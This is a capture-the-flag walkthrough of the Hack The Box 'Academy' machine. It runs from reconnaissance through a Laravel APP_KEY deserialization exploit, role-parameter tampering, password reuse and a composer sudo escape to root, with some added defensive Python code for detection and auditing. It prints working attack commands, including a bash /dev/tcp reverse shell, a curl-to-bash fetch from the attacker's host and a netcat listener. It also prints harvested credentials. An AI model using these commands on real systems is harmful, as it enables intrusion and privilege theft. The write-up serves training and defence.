Academy

Name: Academy
Release Date: 07 Nov 2020
Retire Date: 27 Feb 2021
OS: Linux
Base Points: Easy - Retired [0]
snowscan 00 days, 02 hours, 21 mins, 04 seconds
jkr 00 days, 02 hours, 47 mins, 31 seconds
Creator: egre55
mrb3n
Pentest Workshop PDF: Academy.pdf

I'm going to switch things up here and use AutoRecon instead of just nmap.  AutoRecon is an exceptionally powerful tool best used on full subnets (like an Enterprise Network or <hint hint> the OSCP labs and exam).  So, after running AutoRecon and getting the results, I go ahead and import it into Pentest Workshop (~$300 US a year, but definitely worth the price if you do a lot of pentesting, CTF writeups, etc.). 

So, we start off with 'python3 ../AutoRecon/src/autorecon/autorecon.py 10.10.10.215'.  AutoRecon does take a bit longer than a traditional nmap scan, but it checks a lot more too.  The last task (the full TCP port scan) took forever to finish.  The results look something like:

[*] Scanning target 10.10.10.215
/home/kali/Academy/../AutoRecon/src/autorecon/autorecon.py:503: DeprecationWarning: The explicit passing of coroutine objects to 
asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
  done, pending = await asyncio.wait(pending, return_when=FIRST_COMPLETED)
[*] Running service detection nmap-top-20-udp on 10.10.10.215                                               
[*] Running service detection nmap-quick on 10.10.10.215                                                    
[*] Running service detection nmap-full-tcp on 10.10.10.215                                                 
[!] Service detection nmap-top-20-udp on 10.10.10.215 returned non-zero exit code: 1
[*] Service detection nmap-quick on 10.10.10.215 finished successfully in 20 seconds
[*] Found ssh on tcp/22 on target 10.10.10.215
[*] Found http on tcp/80 on target 10.10.10.215
[*] Running task tcp/22/sslscan on 10.10.10.215
[*] Running task tcp/22/nmap-ssh on 10.10.10.215
[*] Running task tcp/80/sslscan on 10.10.10.215
[*] Running task tcp/80/nmap-http on 10.10.10.215
[*] Running task tcp/80/curl-index on 10.10.10.215
[*] Running task tcp/80/curl-robots on 10.10.10.215
[*] Running task tcp/80/wkhtmltoimage on 10.10.10.215
[*] Running task tcp/80/whatweb on 10.10.10.215
[*] Running task tcp/80/nikto on 10.10.10.215
/home/kali/Academy/../AutoRecon/src/autorecon/autorecon.py:281: DeprecationWarning: The explicit passing of coroutine objects to 
asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
  await asyncio.wait([
[*] Task tcp/22/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/wkhtmltoimage on 10.10.10.215 finished successfully in less than a second
[*] Running task tcp/80/gobuster on 10.10.10.215
[*] Task tcp/80/curl-index on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/curl-robots on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/22/nmap-ssh on 10.10.10.215 finished successfully in 5 seconds
[*] Task tcp/80/nmap-http on 10.10.10.215 finished successfully in 36 seconds
[*] [09:13:19] - There are 4 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/whatweb on 10.10.10.215 finished successfully in 47 seconds
[*] [09:14:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:15:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:16:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:17:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:18:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:19:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/gobuster on 10.10.10.215 finished successfully in 6 minutes, 48 seconds
[*] [09:20:19] - There are 2 tasks still running on 10.10.10.215                                            
[*] [09:21:19] - There are 2 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/nikto on 10.10.10.215 finished successfully in 9 minutes, 23 seconds
[*] [09:22:19] - There is 1 task still running on 10.10.10.215                                              
[*] [09:23:19] - There is 1 task still running on 10.10.10.215                                              
[*] [09:24:19] - There is 1 task still running on 10.10.10.215 

[*] [10:23:42] - There is 1 task still running on 10.10.10.215
[*] [10:24:49] - There is 1 task still running on 10.10.10.215
[*] [10:25:54] - There is 1 task still running on 10.10.10.215
[*] [10:26:58] - There is 1 task still running on 10.10.10.215
[*] [10:28:14] - There is 1 task still running on 10.10.10.215
[*] Service detection nmap-full-tcp on 10.10.10.215 finished successfully in 1 hour, 16 minutes, 33 seconds
[*] Found socks5 on tcp/33060 on target 10.10.10.215
[*] Running task tcp/33060/sslscan on 10.10.10.215
[*] Task tcp/33060/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Finished scanning target 10.10.10.215 in 1 hour, 16 minutes, 34 seconds
[*] Finished scanning all targets in 1 hour, 16 minutes, 34 seconds!

An hour, 16 minutes and 34 seconds to complete.  I told you AutoRecon takes longer.  One of the first things we notice is that there is a web server running: Apache httpd 2.4.41 (Ubuntu).  However, navigating to the IP brings up a search page instead of the web server's own page.  Add '10.10.10.215 academy.htb' to your /etc/hosts file.  Now we can navigate to academy.htb and get a login page.

Viewing the page source tells us that the site is using PHP and where the Login and Register links point.

We want to see what happens when a new user is created, so I'm going to fire up Burp Suite.  I am using Kali 2021.1, which has a newer version of Burp with a built-in browser: no more having to modify your browser's network settings or install certificates.  In that browser, I'm going to create a new user named johndoe with a password of johndoe1 and capture what happens when the user gets created.

After we create the user, it takes us to the Login page.  We can use the new credentials to log in and we see some Modules for the HackTheBox Academy (nice touch; it's usually the whole Lorem Ipsum thing).  One thing the captured registration request shows us is an "&roleid=0" parameter.  That variable might be useful later.  For now, let's run Gobuster on the site and see what else is there for us to find.  We can do that with "gobuster dir -u http://academy.htb -w /usr/share/dirb/wordlists/common.txt"

 
┌──(kali㉿kali)-[~/Academy]
└─$ gobuster dir -u http://academy.htb -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://academy.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/07 11:25:59 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/07 11:26:39 Finished
===============================================================

Ah HA! We found an admin.php page.  We can't log into it with johndoe.  Let's create another user, johndoe2, but this time capture the registration request, change that roleid to 1 and see what happens.

Logging into the standard page doesn't change anything, but now we can log into the admin.php page.
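The roleid trick above is a mass-assignment bug: the signup handler stores whatever role the client posts.  As an added example (not the Academy site's code, which is PHP), here is a Python model of that handler beside a hardened version that whitelists the signup fields and decides the role server-side; the field names follow the captured request, everything else is assumed.

```python
# Added example, not the Academy site's own code (the real app is PHP): a
# Python model of the signup handler that trusts the client-sent "roleid".
# Field names follow the captured request; everything else is assumed.
import hashlib
import os

USERS: dict[str, dict] = {}          # constructed in-memory user store
ALLOWED_SIGNUP_FIELDS = ("username", "password")
ROLE_USER, ROLE_ADMIN = 0, 1         # roleid values seen in the capture (0) and tried (1)


def _hash(password: str) -> bytes:
    salt = os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def register_vulnerable(form: dict) -> dict:
    """Mass assignment: whatever roleid the client posts becomes the account's role."""
    record = {"username": form["username"],
              "pw_hash": _hash(form["password"]),
              "roleid": int(form.get("roleid", ROLE_USER))}   # client controls the role
    USERS[record["username"]] = record
    return record


def tampered_fields(form: dict) -> list[str]:
    """Posted fields a self-service signup has no business sending; worth logging."""
    return sorted(set(form) - set(ALLOWED_SIGNUP_FIELDS))


def register_hardened(form: dict) -> dict:
    """Copies only whitelisted fields; the role is fixed server-side, never by the form."""
    record = {"username": form["username"],
              "pw_hash": _hash(form["password"]),
              "roleid": ROLE_USER}
    USERS[record["username"]] = record
    return record


def is_admin(username: str) -> bool:
    return USERS[username]["roleid"] == ROLE_ADMIN


if __name__ == "__main__":
    forged = {"username": "johndoe2", "password": "johndoe1", "roleid": "1"}
    print("vulnerable admin:", is_admin(register_vulnerable(forged)["username"]))
    print("hardened admin: ", is_admin(register_hardened({**forged, "username": "johndoe3"})["username"]))
    print("tampered fields:", tampered_fields(forged))
```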

Once in, we see there's another subdomain, dev-staging-01.academy.htb.  We'll need to add that to our /etc/hosts file too.  Then we can navigate to it.

Now we're getting somewhere: Laravel is running with an APP_KEY of "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" and a MySQL DB with an instance named homestead, a username of homestead, and a password of secret.

A quick searchsploit later and we find a Laravel 5.X exploit, located at https://www.exploit-db.com/exploits/47129, that looks promising.  Unfortunately, it's a Metasploit module, but I'm sure we can work around that.

We get around that by using aljavier's pwn_laravel script.  Run "git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133" in your working directory.  We will need that APP_KEY from earlier.  Since I am using AutoRecon for the scans, it creates an exploits folder inside the "results" working folder for the host; I placed my copy of the cloned repo in there.  Next, we need to install the requirements and run it.

pip3 install -r requirements.txt
Requirement already satisfied: colorama==0.4.4 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.4.4)
Collecting commonmark==0.9.1
  Downloading commonmark-0.9.1-py2.py3-none-any.whl (51 kB)
     |████████████████████████████████| 51 kB 1.5 MB/s 
Collecting Pygments==2.7.2
  Downloading Pygments-2.7.2-py3-none-any.whl (948 kB)
     |████████████████████████████████| 948 kB 1.7 MB/s 
Collecting rich==9.2.0
  Downloading rich-9.2.0-py3-none-any.whl (164 kB)
     |████████████████████████████████| 164 kB 1.6 MB/s 
Requirement already satisfied: typing-extensions==3.7.4.3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 5)) (3.7.4.3)
Collecting pycryptodome==3.9.9
  Downloading pycryptodome-3.9.9-cp39-cp39-manylinux1_x86_64.whl (13.7 MB)
     |████████████████████████████████| 13.7 MB 763 kB/s 
Requirement already satisfied: requests==2.25.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (2.25.1)
Installing collected packages: commonmark, Pygments, rich, pycryptodome
  WARNING: The script cmark is installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  WARNING: The script pygmentize is installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed Pygments-2.7.2 commonmark-0.9.1 pycryptodome-3.9.9 rich-9.2.0

└─$ python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive

Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 Running in interactive mode. Press CTRL+C to exit.
$ curl http://10.10.14.4 |bash

Before you run the curl statement at the end of the above code block, make sure you do a few things on your machine first.

One terminal: run

"python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive"

to get the low-level interactive shell.

A second terminal: run

"echo 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1' > index.html"

sudo python3 -m http.server 80

A third terminal: run

nc -lvnp 4444

Then, in the first terminal window where the low-level shell is running, you can run:

curl http://10.10.14.4 | bash

This will fetch your HTTP server's index.html file and pipe it into bash, which then kicks off the Netcat callback for a full TTY shell (you can find more screenshots of the steps in the Pentest Workshop PDF).  The www-data user generally can't do much, so let's look around and see what else we can find.  We do have a MySQL instance called homestead on staging, so let's see if we can pull the same ENV information on production.
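From the defender's side, this stage of the chain (www-data running curl, then a shell, then bash -i) is exactly what a process-monitoring rule should flag.  The detection logic below is an added example, not from the writeup or any tool it uses; the JSON process events are constructed to mirror the chain above, and their field names are an assumed EDR/osquery-style schema.

```python
# Added example, not from the writeup or any tool it uses: detection logic for
# the stage reached here, a web-server account (www-data) running a downloader
# and then shells. The JSON process events are constructed for the demo and
# their field names are an assumed EDR/osquery-style schema.
import json
import os
import re

WEB_ACCOUNTS = {"www-data", "apache", "nginx"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")   # "... | bash", "... | sh"

SAMPLE_EVENTS = [  # constructed to mirror the chain in this writeup
    '{"user":"www-data","exe":"/usr/bin/php","argv":["php"]}',
    '{"user":"www-data","exe":"/bin/sh","argv":["sh","-c","curl http://10.10.14.4 | bash"]}',
    '{"user":"www-data","exe":"/usr/bin/curl","argv":["curl","http://10.10.14.4"]}',
    '{"user":"www-data","exe":"/bin/bash","argv":["bash"]}',
    '{"user":"www-data","exe":"/bin/bash","argv":["bash","-i"]}',
    '{"user":"mrb3n","exe":"/bin/bash","argv":["bash"]}',
]


def classify(event: dict) -> list[str]:
    """Names of the rules an event trips; an empty list means benign."""
    hits = []
    prog = os.path.basename(event["exe"])
    cmdline = " ".join(event["argv"])
    if event["user"] in WEB_ACCOUNTS and prog in SHELLS:
        hits.append("web-account-spawned-shell")
    if event["user"] in WEB_ACCOUNTS and prog in DOWNLOADERS:
        hits.append("web-account-download")
    if PIPE_TO_SHELL.search(cmdline):
        hits.append("pipe-to-shell")
    # "bash -i >& /dev/tcp/..." keeps its redirection inside the calling shell, so
    # /dev/tcp rarely shows in argv; the account+shell rule catches that stage.
    if "/dev/tcp/" in cmdline:
        hits.append("bash-dev-tcp")
    return hits


def scan(lines) -> list[tuple[str, list[str]]]:
    """Run each JSON line through classify(); return (cmdline, rules) per alert."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        rules = classify(event)
        if rules:
            alerts.append((" ".join(event["argv"]), rules))
    return alerts
```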

If we try to log into MySQL with mySup3rP4s5w0rd!!, we of course fail.  It couldn't have been that easy.  So, let's try plain password reuse.  Anybody with that lame a password has got to be just this shy of crazy enough to reuse it, right?  Problem is, who do we try it on?  Easy.  "cat /etc/passwd" to get the user list.

So, most of those are the usual default accounts, but there are a few interesting ones.

egre55
mrb3n
cry0l1t3
21y4d
ch4p
g0blin

There are a few ways we can do this.  We can script a run of those 6 users against the one static password, or we can immediately narrow it down to 3 possibilities.  egre55 was what showed in the left corner after creating johndoe, so chances are it won't be him.  My guess would be either mrb3n (the other creator) or this cry0l1t3 account.  I'll try those first.  Sure enough, cry0l1t3 was my target.

Well, there is an interesting item: cry0l1t3 is in the adm group, which in Linux administration is typically allowed to read logs.  Change to the /var/log folder and see what we have.

Another interesting bit: audit logging is enabled.  Let's check the main audit log using aureport and see if there are any other nuggets of info we can use.

Sorry mrb3n, but we just stole your credentials :D 

Username: mrb3n
Password: mrb3n_Ac@d3my!

Time to create/utilize a "save point".  We can SSH to the box with those credentials, so if anything funky happens, we've got an easy way back in without having to start from scratch.  So, what can mrb3n do?  sudo -l shows the account can run composer with sudo!  Composer is one of the GTFOBins!! 

So, how do we exploit this GTFOBin, you ask?  Simple.  3 easy steps.

1) TF=$(mktemp -d)
2) echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
3) sudo composer --working-dir=$TF run-script x

Follow these three steps and "You are Root"
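The fix on the admin side is to never hand out sudo rights to a binary with a GTFOBins shell escape.  As an added example (not from the writeup), this Python audit parses sudo -l output and flags such entries, composer among them; the sample output is constructed, since the box's exact sudoers rule isn't reproduced here.

```python
# Added example, not from the writeup: an audit of "sudo -l" output that flags
# binaries with known GTFOBins shell escapes, composer among them. The sample
# output below is constructed (the box's real sudoers line is not shown here).
import os
import re

# Well-known GTFOBins entries that can hand the caller a shell when run via sudo.
GTFOBINS_SHELL = {"composer", "vim", "find", "less", "awk", "perl", "env", "python3", "nmap"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/less
"""


def parse_sudo_l(text: str) -> list[dict]:
    """Turn each command rule in sudo -l output into {runas, nopasswd, command}."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue                      # header and Defaults lines carry no rule
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in m["cmds"].split(", "):  # sudo lists several commands on one line
            rules.append({"runas": m["runas"], "nopasswd": nopasswd, "command": cmd.strip()})
    return rules


def audit_sudo_l(text: str) -> list[dict]:
    """Rules whose binary is ALL or a GTFOBins shell escape: each is effectively root."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["command"].split()[0])
        if rule["command"] == "ALL" or binary in GTFOBINS_SHELL:
            findings.append({**rule, "binary": binary})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        why = "no password" if f["nopasswd"] else "password required"
        print(f"{f['binary']:10} as ({f['runas']}), {why}: {f['command']}")
```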

Congratulations!  Now go grab an adult beverage and enjoy :D